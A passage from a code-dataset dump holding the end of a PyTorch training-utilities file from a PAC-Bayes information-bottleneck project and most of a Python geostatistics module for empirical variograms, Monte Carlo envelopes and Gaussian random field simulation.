y_batch,\n reduction=\"none\")\n else:\n loss = F.binary_cross_entropy(pred[:,0], y_batch.float(), \n reduction=\"none\")\n\n sum_loss = torch.sum(loss)\n avg_loss = torch.mean(loss)\n\n num_all_train += len(x_batch)\n optimizer.zero_grad()\n avg_loss.backward()\n optimizer.step()\n\n total_loss = total_loss + sum_loss.detach()\n\n if x_va is not None:\n # evaluate on va set\n model.eval()\n pred_va = predict(model, x_va)\n acc_va = eval_metric(pred_va, y_va, num_class)\n if verbose:\n print(\"epoch: {}, acc: {}\".format(epoch, acc_va.item()))\n \n if epoch == 0:\n best_va_acc = acc_va\n\n if acc_va > best_va_acc:\n best_va_acc = acc_va\n early_stop_counter = 0\n # save model\n save_model(early_stop_ckpt_path, model)\n\n else:\n early_stop_counter += 1\n\n if early_stop_counter >= early_stop_tolerance:\n if verbose:\n print(\"early stop on epoch {}, val acc {}\".format(epoch, best_va_acc))\n # load model from the best checkpoint\n load_model(early_stop_ckpt_path, model)\n break\n\n return best_va_acc\n\ndef train_prior(model,\n x_tr, y_tr,\n num_epoch=10,\n batch_size=128,\n lr=1e-3,\n weight_decay=1e-5,\n early_stop_ckpt_path=\"./checkpoints/mlp_prior.pth\",\n verbose=False,\n ):\n all_tr_idx = np.arange(len(x_tr))\n train(model, all_tr_idx, x_tr, y_tr, x_tr, y_tr, \n num_epoch=num_epoch,\n batch_size=batch_size,\n lr=lr,\n weight_decay=weight_decay,\n early_stop_ckpt_path=early_stop_ckpt_path,\n verbose=verbose,\n )\n w0_dict = dict()\n for param in model.named_parameters():\n w0_dict[param[0]] = param[1].clone().detach() # detach but still on gpu\n model.w0_dict = w0_dict\n model._initialize_weights()\n print(\"done get prior weights\")\n\ndef train_track_info(model,\n sub_idx,\n x_tr, y_tr, \n x_va, y_va, \n num_epoch,\n batch_size,\n lr,\n weight_decay,\n track_info_per_iter=-1,\n verbose=True,\n ):\n \"\"\"Given selected subset, train the model until converge.\n Args:\n model: the trained model class\n sub_idx: picked sample indices in training data\n x_tr, y_tr, x_va, y_va: tr/va data set and labels\n track_info_per_iter: evaluate information per %S iterations (SGD updates),\n if set to -1, track info at the end of every epoch\n \"\"\"\n\n info_dict = defaultdict(list)\n loss_acc_dict = defaultdict(list)\n\n # init training with the SGLD optimizer\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=lr, weight_decay=weight_decay)\n\n # num class\n num_class = torch.unique(y_va).shape[0]\n num_all_tr_batch = int(np.ceil(len(sub_idx) / batch_size))\n num_all_train = 0\n iteration = 0\n for epoch in range(num_epoch):\n total_loss = 0\n model.train()\n np.random.shuffle(sub_idx)\n\n for idx in range(num_all_tr_batch):\n iteration += 1\n batch_idx = sub_idx[idx*batch_size:(idx+1)*batch_size]\n x_batch = x_tr[batch_idx]\n y_batch = y_tr[batch_idx]\n\n pred = model(x_batch)\n\n if num_class > 2:\n loss = F.cross_entropy(pred, y_batch,\n reduction=\"none\")\n else:\n loss = F.binary_cross_entropy(pred[:,0], y_batch.float(), \n reduction=\"none\")\n\n avg_loss = torch.mean(loss)\n\n optimizer.zero_grad()\n\n avg_loss.backward()\n\n optimizer.step()\n\n num_all_train += len(x_batch)\n\n total_loss = total_loss + avg_loss.item()\n\n if iteration % track_info_per_iter == 0 and track_info_per_iter > 0:\n # estimate information stored in weights\n info = model.compute_information_bp_fast(x_tr, y_tr, no_bp=True)\n for k in info.keys():\n info_dict[k].append(info[k])\n if verbose:\n print(\"iteration/epoch: {}/{}, info: {}\".format(iteration, epoch, info))\n if verbose:\n print(\"epoch: {}, tr loss: {}, lr: {:.6f}\".format(epoch, total_loss/num_all_tr_batch, lr))\n\n # start to evaluate\n if epoch % 1 == 0:\n model.eval()\n pred_tr = predict(model, x_tr)\n acc_tr = eval_metric(pred_tr, y_tr, num_class)\n\n loss_acc_dict[\"tr_loss\"].append((total_loss/num_all_tr_batch))\n loss_acc_dict[\"tr_acc\"].append(acc_tr.item())\n\n if x_va is not None:\n # evaluate on va set\n model.eval()\n pred_va = predict(model, x_va)\n acc_va = eval_metric(pred_va, y_va, num_class)\n if verbose:\n print(\"epoch: {}, va acc: {}\".format(epoch, acc_va.item()))\n loss_acc_dict[\"va_acc\"].append(acc_va.item())\n \n # track info every epoch \n if track_info_per_iter == -1:\n info = model.compute_information_bp_fast(x_tr, y_tr, no_bp=True)\n for k in info.keys():\n info_dict[k].append(info[k])\n if verbose:\n print(\"epoch: {}, info: {}\".format(epoch, info))\n \n l2_norm = 0\n for pa in model.named_parameters():\n l2_norm += pa[1].data.norm(2)\n loss_acc_dict[\"l2_norm\"].append(l2_norm.cpu().item())\n\n\n\n return info_dict, loss_acc_dict\n\n\ndef save_model(ckpt_path, model):\n torch.save(model.state_dict(), ckpt_path)\n return\n\ndef load_model(ckpt_path, model):\n try:\n model.load_state_dict(torch.load(ckpt_path))\n except:\n model.load_state_dict(torch.load(ckpt_path, map_location=\"cpu\"))\n\n return\n\ndef predict(model, x, batch_size=100):\n model.eval()\n num_all_batch = np.ceil(len(x)/batch_size).astype(int)\n pred = []\n for i in range(num_all_batch):\n with torch.no_grad():\n pred_ = model(x[i*batch_size:(i+1)*batch_size])\n pred.append(pred_)\n\n pred_all = torch.cat(pred) # ?, num_class\n return pred_all\n\ndef eval_metric(pred, y, num_class):\n if num_class > 2:\n pred_argmax = torch.max(pred, 1)[1]\n acc = torch.sum((pred_argmax == y).float()) / len(y)\n else:\n acc = eval_metric_binary(pred, y)\n return acc\n\ndef eval_metric_binary(pred, y):\n pred_label = np.ones(len(pred))\n y_label = y.detach().cpu().numpy()\n pred_prob = pred.flatten().cpu().detach().numpy()\n pred_label[pred_prob < 0.5] = 0.0\n acc = torch.Tensor(y_label == pred_label).float().mean()\n return acc\n\ndef setup_seed(seed):\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\ndef feature_map_size(dataname):\n ft_map_size = {\n 'cifar10':4,\n 'cifar100':4,\n 'stl10':12,\n 'svhn':4,\n }\n return ft_map_size[dataname]\n\n\n'''specifically used for plot jupyter notebook.\n'''\ndef plot_info_acc(info_dict, loss_acc_list, act, fig_dir='./figure'):\n df_info = pd.DataFrame(info_dict)\n with plt.style.context(['science','nature',]):\n fig, axs = plt.subplots(2, 1, figsize=(6,8))\n for i,col in enumerate(df_info.columns):\n axs[0].plot(df_info[col], label=__LAYER_LIST__[i], lw=2)\n axs[0].set_xlabel('epoch', size=24)\n axs[0].set_ylabel('IIW',size=24)\n axs[0].tick_params(labelsize=20)\n axs[0].set_title('IIW of {} MLP'.format(act), size=20)\n axs[0].legend(fontsize=24)\n\n # plot loss acc\n ax1 = axs[1]\n ax2 = ax1.twinx()\n lns1 = ax1.plot(loss_acc_list['tr_loss'], label='train loss', color='r', lw=2)\n lns2 = ax2.plot(loss_acc_list['va_acc'], label='test acc', lw=2)\n ax1.set_xlabel('epoch', size=24)\n ax1.set_ylabel('loss', size=24)\n ax2.set_ylabel('acc', size=24)\n ax1.tick_params(labelsize=20)\n ax2.tick_params(labelsize=20)\n ax1.set_ylim(0.3,2.5)\n ax2.set_ylim(0.5,0.8)\n ax1.set_yticks([0.5, 1.0, 1.5, 2.0, 2.5])\n ax2.set_yticks([0.5,0.6,0.7,0.8])\n lns = lns1+lns2\n labs = [l.get_label() for l in lns]\n ax1.legend(lns, labs, fontsize=24)\n plt.tight_layout()\n\n\n plt.savefig(os.path.join(fig_dir,\"{}_acc_loss.png\".format(act)),bbox_inches = 'tight')\n plt.show()\n\n\ndef plot_info(info_dict, fig_dir='./figure', use_legend=True):\n '''specifically used for plot jupyter notebook.\n '''\n df_info = pd.DataFrame(info_dict)\n with plt.style.context(['science','nature',]):\n fig, axs = plt.subplots(figsize=(6,4))\n for i,col in enumerate(df_info.columns):\n axs.plot(df_info[col], label=__LAYER_LIST__[i], lw=2)\n axs.set_xlabel('iteration', size=28)\n axs.set_ylabel('IIW',size=28)\n axs.tick_params(labelsize=24)\n axs.yaxis.get_major_formatter().set_powerlimits((0,1))\n axs.set_title('IIW of {}-layer MLP'.format(int(len(df_info.columns))), size=28)\n if use_legend:\n axs.legend(fontsize=26)\n plt.tight_layout()\n plt.savefig(os.path.join(fig_dir,\"mlp_{}_info.pdf\".format(int(len(df_info.columns)))),bbox_inches = 'tight')\n plt.show()\n\n","repo_name":"RyanWangZf/PAC-Bayes-IB","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11914,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"37"} +{"seq_id":"34697081648","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n\n\"\"\"\nTools for analysing spatial data\n===================\nRequires:\n * Pandas\n * GeoPandas\n * Numpy\n * shapely\n \n\n\"\"\"\n\n\n__author__ = \"Juan Escamilla Mólgora\"\n__copyright__ = \"Copyright 2017, JEM\"\n__license__ = \"GPL\"\n__mantainer__ = \"Juan\"\n__email__ =\"molgor@gmail.com\"\n\n\n\nimport geopandas as gpd\nimport pandas as pd\nfrom shapely.geometry import Point\nimport scipy.spatial as sp\nimport scipy.special as special\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport logging\n#from external_plugins.spystats import tools as tl\n\n\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\n\n\n\n\n## These are function for handling dataframes and creating subsets.\ndef toGeoDataFrame(pandas_dataframe,xcoord_name,ycoord_name,srs = 'epsg:4326'):\n \"\"\"\n Convert Pandas objcet to GeoDataFrame\n Inputs:\n pandas_dataframe : the pandas object to spatialise\n xcoord_name : (String) the column name of the x coordinate.\n ycoord_name : (String) the column name of the y coordinate. \n srs : (String) the source referencing system in EPSG code.\n e.g. epsg:4326 .\n \"\"\"\n data = pandas_dataframe\n data['geometry'] = data.apply(lambda z : Point(z[xcoord_name], z[ycoord_name]), axis=1)\n #data['geometry'] = data.apply(lambda z : Point(z.LON, z.LAT), axis=1)\n\n new_data = gpd.GeoDataFrame(data)\n new_data.crs = {'init':'epsg:4326'}\n return new_data\n\ndef _subselectDataFrameByCoordinates(dataframe,namecolumnx,namecolumny,minx,maxx,miny,maxy):\n \"\"\"\n Returns a subselection by coordinates using the dataframe/\n \"\"\"\n minx = float(minx)\n maxx = float(maxx)\n miny = float(miny)\n maxy = float(maxy)\n section = dataframe[lambda x: (x[namecolumnx] > minx) & (x[namecolumnx] < maxx) & (x[namecolumny] > miny) & (x[namecolumny] < maxy) ]\n return section\n\ndef _getExtent(geodataframe):\n \"\"\"\n REturn the tuple of the spatial extent. Based on geopandas geometry attribute.\n \"\"\"\n minx = min(geodataframe.geometry.x)\n maxx = max(geodataframe.geometry.x)\n\n miny = min(geodataframe.geometry.y)\n maxy = max(geodataframe.geometry.y)\n \n\n return (minx,maxx,miny,maxy)\n \ndef _getExtentFromPoint(x,y,step_sizex,step_sizey):\n \"\"\"\n Returns a tuple (4) specifying the minx,maxx miny, maxy based on a given point and a step size.\n The x,y point is located in the bottom left corner.\n \"\"\" \n minx = x\n miny = y\n maxx = x + step_sizex\n maxy = y + step_sizey\n return (minx,maxx,miny,maxy)\n\ndef _getDistanceMatrix(geopandas_dataset):\n \"\"\"\n Returns the \"self/auto\" distance matrix of a given list of vector data. \n By default it uses the Minkowski distance of order 2.\n Parameters :\n p : the Minkowski distance exponent (order)\n \"\"\"\n data = geopandas_dataset\n coords = list(zip(data.centroid.x,data.centroid.y))\n dM = sp.distance_matrix(coords,coords,p=2.0)\n return dM\n \ndef _getDistResponseVariable(geopandas_dataset,response_variable_name):\n \"\"\" \n Returns the \"self/auto\" distance matrix of a response variable Y \n By default it uses the Minkowski distance of order 2.\n meaning:\n $$ v_{i,j} = \\sum_{i=1}^{n} (y_i - y_j)^2 $$\n Parameters :\n geopandas_dataset : (geopandas) the geopandas dataframe.\n response_variable_name : (string) name of the variable for calculating the distance.\n p : the Minkowski distance exponent (order)\n \"\"\"\n data = geopandas_dataset\n y = data[response_variable_name].astype('float')\n yy = y.values.reshape(-1,1)\n dY = sp.distance_matrix(yy,yy,p=2.0)\n return dY\n \n\n\n\n## This functions are for defining an empirical variogram\ndef calculateEmpiricalVariogram(distances,response_variable,n_bins=50,distance_threshold=False):\n \"\"\"\n Returns the empirical variogram given by the formula\n $$ v_{lag_i} = \\frac{\\sum_{i=1}^{N(lag_i)} (y_i - y_j)^2}{2} $$ \n Parameters:\n n_bins : (Integer) number of bins (lag distances) \n \"\"\"\n mdist = min(distances)\n if distance_threshold :\n Mdist = distance_threshold * (1.0/10.0 + 1)\n else:\n Mdist = max(distances)\n \n partitions = np.linspace(mdist,Mdist,n_bins)\n lags = partitions[:n_bins - 1]\n y = response_variable\n d = pd.DataFrame({'dist': distances,'y':y})\n \n if distance_threshold:\n d = d[ d['dist'] < distance_threshold ]\n # The actual emp. var function \n #import ipdb; ipdb.set_trace()\n empvar = map(lambda ix : 0.5 * (d[ ( d.dist < partitions[ix[0]+1]) & (d.dist>partitions[ix[0]])].y.mean()),enumerate(lags))\n ## Get number of elements here\n n_points = map(lambda ix : d[ ( d.dist < partitions[ix[0]+1]) & (d.dist>partitions[ix[0]])].shape[0],enumerate(lags))\n \n \n \n #self.empirical = empvar\n content = {'lags':lags,'variogram':list(empvar),'n_points' : list(n_points)}\n results = pd.DataFrame(content)\n \n return results\n \n\ndef montecarloEnvelope(distances,response_variable,num_iterations=99,n_bins=50,distance_threshold=False):\n \"\"\"\n Generate Monte Carlo envelope by shuffling the response variable and keeping the distances the same.\n After GeoR. (\"Model-Based Geostatistics; Diggle and Ribeiro, 2007\")\n Parameters :\n distances (List) linearised format of a distance matrix\n response_variable (list) linearised format of a response distance matrix.\n \"\"\"\n simulation_variograms = []\n d = calculateEmpiricalVariogram(distances,response_variable,n_bins=n_bins,distance_threshold=distance_threshold)\n for i in range(num_iterations):\n #np.random.shuffle(response_variable)\n d = calculateEmpiricalVariogram(distances,response_variable,n_bins=n_bins,distance_threshold=distance_threshold)\n simulation_variograms.append(d.variogram)\n np.random.shuffle(response_variable)\n\n #simulation_variograms.append(d.lags)\n #sims = pd.DataFrame(simulation_variograms).transpose()\n sims = pd.DataFrame(simulation_variograms)\n ## Drop any possible Nan, incompatible with quantile\n sims = sims.dropna(axis=1)\n #sims.set_index('lags')\n \n low_q = sims.quantile(0.025)\n high_q = sims.quantile(0.975)\n envelope = pd.DataFrame({'envlow':low_q,'envhigh':high_q,'lags':d.lags})\n return (envelope,sims)\n #return envelope \n\nclass Variogram(object):\n \"\"\"\n A class that defines Empirical Variogram objects.\n \"\"\"\n def __init__(self,geopandas_dataset,response_variable_name,model='',using_distance_threshold=False):\n \"\"\"\n Constructor\n Parameters :\n geopandas_dataset : (geopandas) the geopandas dataframe.\n response_variable_name : (string) name of the variable for calculating the distance.\n p : the Minkowski distance exponent (order)\n distance_threshold : same units as coordinates\n \"\"\"\n self.data = geopandas_dataset\n self.selected_response_variable = response_variable_name\n self.empirical = pd.Series()\n self.lags = []\n self.envelope = pd.DataFrame()\n self.distance_threshold = using_distance_threshold\n self.n_points = []\n self.model = model\n \n @property\n def distance_coordinates(self): \n return _getDistanceMatrix(self.data)\n @property\n def distance_responses(self):\n return _getDistResponseVariable(self.data,self.selected_response_variable)\n\n \n def calculateEmpirical(self,n_bins=50):\n \"\"\"\n Returns the empirical variogram given by the formula:\n $$ v_{lag_i} = \\frac{\\sum_{i=1}^{N(lag_i)} (y_i - y_j)^2}{2} $$\n \n Parameters:\n n_bins : (Integer) number of bins (lag distances) \n \n This only assigns the data to the corresponding attributes.\n \n \"\"\"\n \n distances = self.distance_coordinates.flatten()\n y = self.distance_responses.flatten()\n results = calculateEmpiricalVariogram(distances,y,n_bins=n_bins,distance_threshold=self.distance_threshold)\n\n self.lags = results.lags\n self.empirical = results.variogram\n self.n_points = results.n_points\n return self.empirical\n \n def calculateEnvelope(self,num_iterations=99,n_bins=50):\n \"\"\"\n Calculates the Montecarlo variogram envelope.\n \"\"\"\n logger.info(\"Calculating envelope via MonteCarlo Simulations. \\n Using %s iterations\"%num_iterations)\n distances = self.distance_coordinates.flatten()\n responses = self.distance_responses.flatten()\n envelopedf,sims = montecarloEnvelope(distances,responses,num_iterations=num_iterations,n_bins=n_bins,distance_threshold=self.distance_threshold)\n envelopedf = pd.concat([envelopedf,self.empirical],axis=1)\n self.envelope = envelopedf\n return envelopedf\n \n def plot(self,with_envelope=False,percentage_trunked=10,refresh=True,n_bins=50,plot_filename=False,**kwargs):\n \"\"\"\n Plot the empirical semivariogram with optional confidence interval using MonteCarlo permutations at 0.025 and 0.975 quantiles.\n Returns a matplotlib object.\n Parameters : \n with_envelope : (Boolean) if true it will calculate and plot the 0.025 and 0.975 quantiles of a montecarlo permutations of $Y$ using fixed locations.\n percentage_trunked = (float) Percentage of data removed in the plot. This is to ease the visualisation by cutting the last values\n \n Extra parameters in the kwargs\n * num_iterations : (Integer) see CalculateEnvelope\n * n_bins : (Integer) see calculate_variogram \n \n \"\"\"\n \n \n\n if (self.empirical.empty or refresh == True):\n logger.info(\"Calculating empirical variogram\")\n self.calculateEmpirical(n_bins=n_bins)\n try :\n self.envelope.variogram = self.empirical\n except:\n logger.info(\"Envelope attribute not found. Storing variogram in empirical attribute\")\n \n nrows = self.empirical.shape[0]\n indx = int(np.ceil(float(percentage_trunked)/100 * nrows))\n \n lags = self.lags.iloc[: (nrows - indx)]\n empirical = self.empirical.iloc[:(nrows - indx)]\n \n \n if with_envelope:\n if ( self.envelope.empty or refresh == True) :\n logger.info(\"No envelope object found. Calculating...\")\n num_iter = kwargs.get('num_iterations')\n if isinstance(num_iter, int):\n self.calculateEnvelope(num_iterations=num_iter,n_bins=n_bins)\n else:\n self.calculateEnvelope()\n else:\n logger.info(\"Using previously stored envelope. Use refresh option to recalculate.\") \n \n envelope = self.envelope.iloc[:(nrows - indx)]\n \n plt.plot(lags,envelope.envhigh,'k--')\n plt.plot(lags,envelope.envlow,'k--')\n plt.fill_between(lags,envelope.envlow,envelope.envhigh,alpha=0.5)\n plt.legend(labels=['97.5%','emp. varig','2.5%'])\n \n \n ## ********* PLOT \n plt.plot(lags,empirical,'o--',lw=2.0) \n ## ****** PLOT\n plt.legend(loc='best')\n plt.xlabel(\"Distance in meters\")\n plt.ylabel(\"Semivariance\")\n #plt.legend(labels=['97.5%','emp. varig','2.5%'])\n #ax = \n #points2 = plt.lines(vg.lags,vg.empirical,c='red')\n #plt.show()\n logger.debug(\"Check which object to return. maybe a figure\")\n \n\n \n \n if plot_filename :\n plt.savefig(plot_filename)\n \n return None \n \n\n\n## This function is useful for calculating the empirical variogram using the chunk method\n## Attention: this method does not implements a neighbouring pointa (out of the edge effect)\n\n def fitVariogramModel(self,model_instance,parameter_set=[]):\n \"\"\"\n Fits a valid model (tools.models) to the empirical variogram object as base.\n \n Parameters:\n model_class : the class of a valid model.\n parameter_set : a tuple containing the init guesses for the parameters to be fitted from the model\n \n Returns:\n A function with the optimized parameters.\n \"\"\"\n if parameter_set:\n parameter_dict = model_instance.fit(self,parameter_set)\n else:\n parameter_dict = model_instance.fit(self)\n \n \n logger.info(\"Added fitted model to attributes\")\n self.model = model_instance\n return self.model\n \n def fitTheoreticalVariogramModel(self,model,parameter_set):\n \"\"\"\n Fits a valid model (tools.model) to the empirical variogram object as base.\n \n Parameters:\n model : a Valid model (function)\n parameter_set : a tuple containing the init guesses for the parameters to be fitted from the model\n \n Returns:\n A function with the optimized parameters.\n \n notes::\n Deprecated. Use: fitVariogramModel\n \"\"\"\n \n logger.warn(\"Deprecated. Use: fitVariogramModel\")\n logger.info(\"Removing possible NA's\")\n self.envelope = self.envelope.dropna()\n variogram = self.envelope.variogram.values\n lags = self.envelope.lags.values\n from scipy.optimize import curve_fit\n #try:\n best_params, covar_model = curve_fit(model, xdata=lags, ydata=variogram, p0=parameter_set)\n #except:\n # logger.error(\"Model selected doesn´t support more than 3 parametes\")\n \n teovarmodel = theoreticalVariogram(model,*best_params)\n logger.info(\"Adding model to the attributes space\")\n setattr(self,'model',model)\n setattr(self,'model_params',best_params)\n setattr(self,'model_covar',covar_model)\n \n return (teovarmodel,{'parameters':best_params,'covar_model':covar_model})\n\n def calculateCovarianceMatrix(self):\n \"\"\"\n Returns an evaluation of the Covariance matrix, given the model stored as attribute.\n \"\"\"\n MMdist = self.distance_coordinates\n Sigma = self.model.calculateCovarianceMatrixWith(MMdist)\n return Sigma\n\n\n\n\ndef PartitionDataSet(geodataset,namecolumnx,namecolumny,n_chunks=10,minimmum_number_of_points=10):\n \"\"\"\n Divides the given geodataset into n*n number of chunks\n Parameters : \n geodataset (GeoDataset) with defined coordinates (geometric column)\n n_chunks : (int) desired number of chunks per dimension (resulting nxn chunks)\n minimmum_number_of_points : (int) the minimum number of points for accepting a chunk as valid.\n \"\"\"\n data = geodataset\n minx,maxx,miny,maxy = _getExtent(data)\n N = n_chunks\n xp,dx = np.linspace(minx,maxx,N,retstep=True)\n yp,dy = np.linspace(miny,maxy,N,retstep=True)\n xx,yy = np.meshgrid(xp,yp)\n coordinates_list = [ (xx[i][j],yy[i][j]) for i in range(N) for j in range(N)]\n from functools import partial\n tuples = map(lambda x,y : partial(_getExtentFromPoint,x,y,step_sizex=dx,step_sizey=dy)(),coordinates_list)\n chunks = map(lambda mx,Mx,my,My : _subselectDataFrameByCoordinates(data,namecolumnx,namecolumny,mx,Mx,my,My),tuples)\n ## Here we can filter based on a threshold\n threshold = minimmum_number_of_points\n chunks_non_empty = filter(lambda df : df.shape[0] > threshold ,chunks)\n return chunks_non_empty\n \n\ndef createGrid(minx=0.0, maxx = 1.0,miny=0.0,maxy=1.0,grid_sizex=50,grid_sizey=50):\n \"\"\"\n Create a Square Grid with custom coordinates an size.\n Parameters :\n minx : (Float) where to start point 0\n maxx :(FLoat) where to finish grid \n grid_size : (Int) number of points per side.\n \"\"\"\n nx = np.linspace(minx,maxx,grid_sizex)\n ny = np.linspace(miny,maxy,grid_sizey)\n xx, yy = np.meshgrid(nx,ny)\n points = pd.DataFrame({'Lon': xx.ravel(),'Lat':yy.ravel()})\n points = toGeoDataFrame(points,'Lon','Lat')\n return points\n\n\n\ndef simulateGaussianRandomField(variogram_model,grid,random_seed=False,return_matrix=True):\n \"\"\"\n Returns a Random simulation of the derived Multivariate Normal Distribution with $\\mu$ response variable and $Sigma$ = Resulting Covariate Matrix from model.\n Parameters : \n variogram Model (Variogram) : an instance from variogram\n grid (Dataframe) : a geodata frame with coordinates.\n random_seed : (Integer) a random seed to reproduce results.\n \n return_matrix : (Bool) if true it will return a square matrix.\n note: For this case the grid must be SQUARE. \n \n note: to create the variogram see: createSquareGrid\n \n \"\"\"\n n_sq = len(grid)\n Y = np.zeros(n_sq)\n grid['Y'] = Y\n vg = Variogram(grid,'Y',model=variogram_model)\n logger.info(\"Calculating Sigma (CovMat)\")\n Sigma = vg.calculateCovarianceMatrix()\n from scipy.stats import multivariate_normal as mvn\n if random_seed:\n np.random.seed(random_seed)\n sim1 = mvn.rvs(mean=Y,cov=Sigma) \n if return_matrix:\n n = int(np.sqrt(n_sq))\n return sim1.reshape(n,n)\n else:\n s = pd.DataFrame({'sim':sim1})\n return s\n\ndef simulatedGaussianFieldAsPcolorMesh(variogram_model,minx=0.0, maxx = 1.0,miny=0.0,maxy=1.0,grid_sizex=50,grid_sizey=50,random_seed=False):\n \"\"\"\n A wrapper that creates a grid and performs a simulated Gaussian process\n It returns a triplet to plot directly using matplotlib.pcolor or pcolormesh.\n \n note: It uses the functions: `createGrid` and `simulateGaussianRandomField`\n \"\"\"\n grid1 = createGrid(minx, maxx, miny, maxy, grid_sizex, grid_sizey)\n sim = simulateGaussianRandomField(variogram_model,grid1,random_seed=random_seed,return_matrix=False)\n del(grid1)\n nx = np.linspace(minx,maxx,grid_sizex)\n ny = np.linspace(miny,maxy,grid_sizey)\n xx, yy = np.meshgrid(nx,ny)\n sim = sim.sim.values.reshape(grid_sizey,grid_sizex)\n return (xx,yy,sim)\n\n### Theoretical Models\ndef gaussianVariogram(h,sill=0,range_a=0,nugget=0):\n \"\"\"\n The Gaussian Variogram, positive SEMI definite, and it's not recommended to use.\n \n $$\\gamma (h)=(s-n)\\left(1-\\exp \\left(-{\\frac {h^{2}}{r^{2}a}}\\right)\\right)+n1_{{(0,\\infty )}}(h)$$\n \n Parameters:\n h : (Float or Numpy Array) Distances to evaluate\n sill : Float\n range_a : Float\n nugget : Float \n \n \"\"\"\n if isinstance(h,np.ndarray):\n #Ih = np.array([1.0 if hx >= 0.0 else 0.0 for hx in h])\n Ih = np.copy(h)\n Ih[Ih >= 0.0 ] = 1.0\n Ih[Ih < 0.0] = 0.0\n else:\n Ih = 1.0 if h >= 0 else 0.0\n #Ih = 1.0 if h >= 0 else 0.0 \n g_h = ((sill - nugget)*(1 - np.exp(-(h**2 / range_a**2)))) + nugget*Ih\n return g_h\n\ndef exponentialVariogram(h,sill=0,range_a=0,nugget=0):\n \"\"\"\n The exponential variogram model\n \n $$\\gamma (h)=(s-n)(1-\\exp(-h/(ra)))+n1_{{(0,\\infty )}}(h)$$\n \n Parameters:\n h : (Float or Numpy Array) Distances to evaluate\n sill : Float\n range_a : Float\n nugget : Float \n \n \"\"\"\n \n if isinstance(h,np.ndarray):\n #Ih = np.array([1.0 if hx >= 0.0 else 0.0 for hx in h])\n Ih = np.copy(h)\n Ih[Ih >= 0.0 ] = 1.0\n Ih[Ih < 0.0] = 0.0\n else:\n Ih = 1.0 if h >= 0 else 0.0\n g_h = (sill - nugget)*(1 - np.exp(-h/range_a)) + (nugget*Ih)\n return g_h\n\ndef sphericalVariogram(h,sill=0,range_a=0,nugget=0):\n \"\"\"\n The spherical variogram \n \n $$\\gamma (h)=(s-n)\\left(\\left({\\frac {3h}{2r}}-{\\frac {h^{3}}{2r^{3}}}\\right)1_{{(0,r)}}(h)+1_{{[r,\\infty )}}(h)\\right)+n1_{{(0,\\infty )}}(h))$$\n\n Parameters:\n h : (Float or Numpy Array) Distances to evaluate\n sill : Float\n range_a : Float\n nugget : Float \n\n \"\"\"\n \n if isinstance(h,np.ndarray):\n #Ih = np.array([1.0 if hx >= 0.0 else 0.0 for hx in h])\n Ih = np.copy(h)\n Ih[Ih >= 0.0 ] = 1.0\n Ih[Ih < 0.0] = 0.0\n I0r = np.array([1.0 if hi <= range_a else 0.0 for hi in h])\n Irinf = [1.0 if hi > range_a else 0.0 for hi in h]\n else:\n Ih = 1.0 if h >= 0 else 0.0\n I0r = [1.0 if hi <= range_a else 0.0 for hi in h]\n Irinf = [1.0 if hi > range_a else 0.0 for hi in h]\n g_h = (sill - nugget)*((3*h / float(2*range_a))*I0r + Irinf) - (h**3 / float(2*range_a)) + (nugget*Ih)\n return g_h\n\n\n\n#def MaternVariogram(h,range_a,nugget=40,sill=100,kappa=0.5):\ndef maternVariogram(h,sill=1,range_a=100,nugget=40,kappa=0.5): \n \"\"\"\n The Matern Variogram of order $\\kappa$.\n \n $$ \\gamma(h) = nugget + (sill (1 - (\\farc{1}{2^{\\kappa -1}} \\Gamma(\\kappa) (\\frac{h}{r})^{\\kappa} K_\\kappa \\Big(\\frac{h}{r}\\Big)$$\n \n Let:\n a = $(2^{\\kappa -1} \\Gamma(\\kappa))^{-1}$ \n b = $\\frac{h}{\\phi}$\n K_v = Modified Bessel function of the second kind of real order v\n \"\"\"\n \n #a = np.power(2, 1 - kappa) / special.gamma(kappa)\n #b = (np.sqrt(2 * kappa) / range_a) * h\n a = 1 / (np.power(2,kappa - 1 ) * special.gamma(kappa))\n \n b = (h / float(range_a))\n #Modified bessel function of second kind order kappa evaluated at b\n K_v_b = special.kv(kappa,b)\n \n rho_h = a * np.power(b,kappa) * K_v_b\n \n kh = sill * (1 - rho_h)\n \n ##legacy\n ##kh = sigma * a * np.power(b,kappa) * K_v\n ##kh = (sill - nugget) * ( 1 - (a * np.power(b,kappa) * K_v))\n #kh = nugget + (sill * ( 1 - (a * np.power(b,kappa) * K_v)))\n ## end legacy\n kh = np.nan_to_num(kh)\n\n return kh \n\ndef whittleVariogram(h,sill=0,range_a=0,nugget=0,alpha=1):\n \"\"\"\n The Whittle Variogram, an alternative to the Gaussian Model.\n $$\\gamma (h)=(s-n)\\left(1-\\exp \\left(-{\\frac {h^{\\alpha}}{r^{\\alpha}}}\\right)\\right)+n1_{{(0,\\infty )}}(h)$$\n\n $$\\gamma (h)=\\sigma^2\\left(1-\\exp \\left(-{\\frac {h^{\\alpha}}{r^{\\alpha}}}\\right)\\right)+n1_{{(0,\\infty )}}(h)$$\n \n\n \n Parameters:\n h : (Float or Numpy Array) Distances to evaluate\n sill : Float\n range_a : Float\n nugget : Float \n \n \"\"\"\n if isinstance(h,np.ndarray):\n #Ih = np.array([1.0 if hx >= 0.0 else 0.0 for hx in h])\n Ih = np.copy(h)\n Ih[Ih >= 0.0 ] = 1.0\n Ih[Ih < 0.0] = 0.0\n else:\n Ih = 1.0 if h >= 0 else 0.0\n #Ih = 1.0 if h >= 0 else 0.0 \n g_h = ((sill - nugget)*(1 - np.exp(-(h**alpha / range_a**alpha)))) + nugget*Ih\n return g_h\n\ndef theoreticalVariogram(model_function,sill,range_a,nugget,alpha=0):\n if alpha == 0:\n return lambda x : model_function(x,sill,range_a,nugget)\n else: \n return lambda x : model_function(x,sill,range_a,nugget,alpha)\n\nclass VariogramModel(object):\n \"\"\"\n This class specifies several variogram models.\n \"\"\"\n def __init__(self,sill=0,range_a=0,nugget=0):\n \"\"\"\n Constructor:\n optional parameters for defining the model.\n \"\"\"\n self.sill = sill\n self.range_a = range_a\n self.nugget 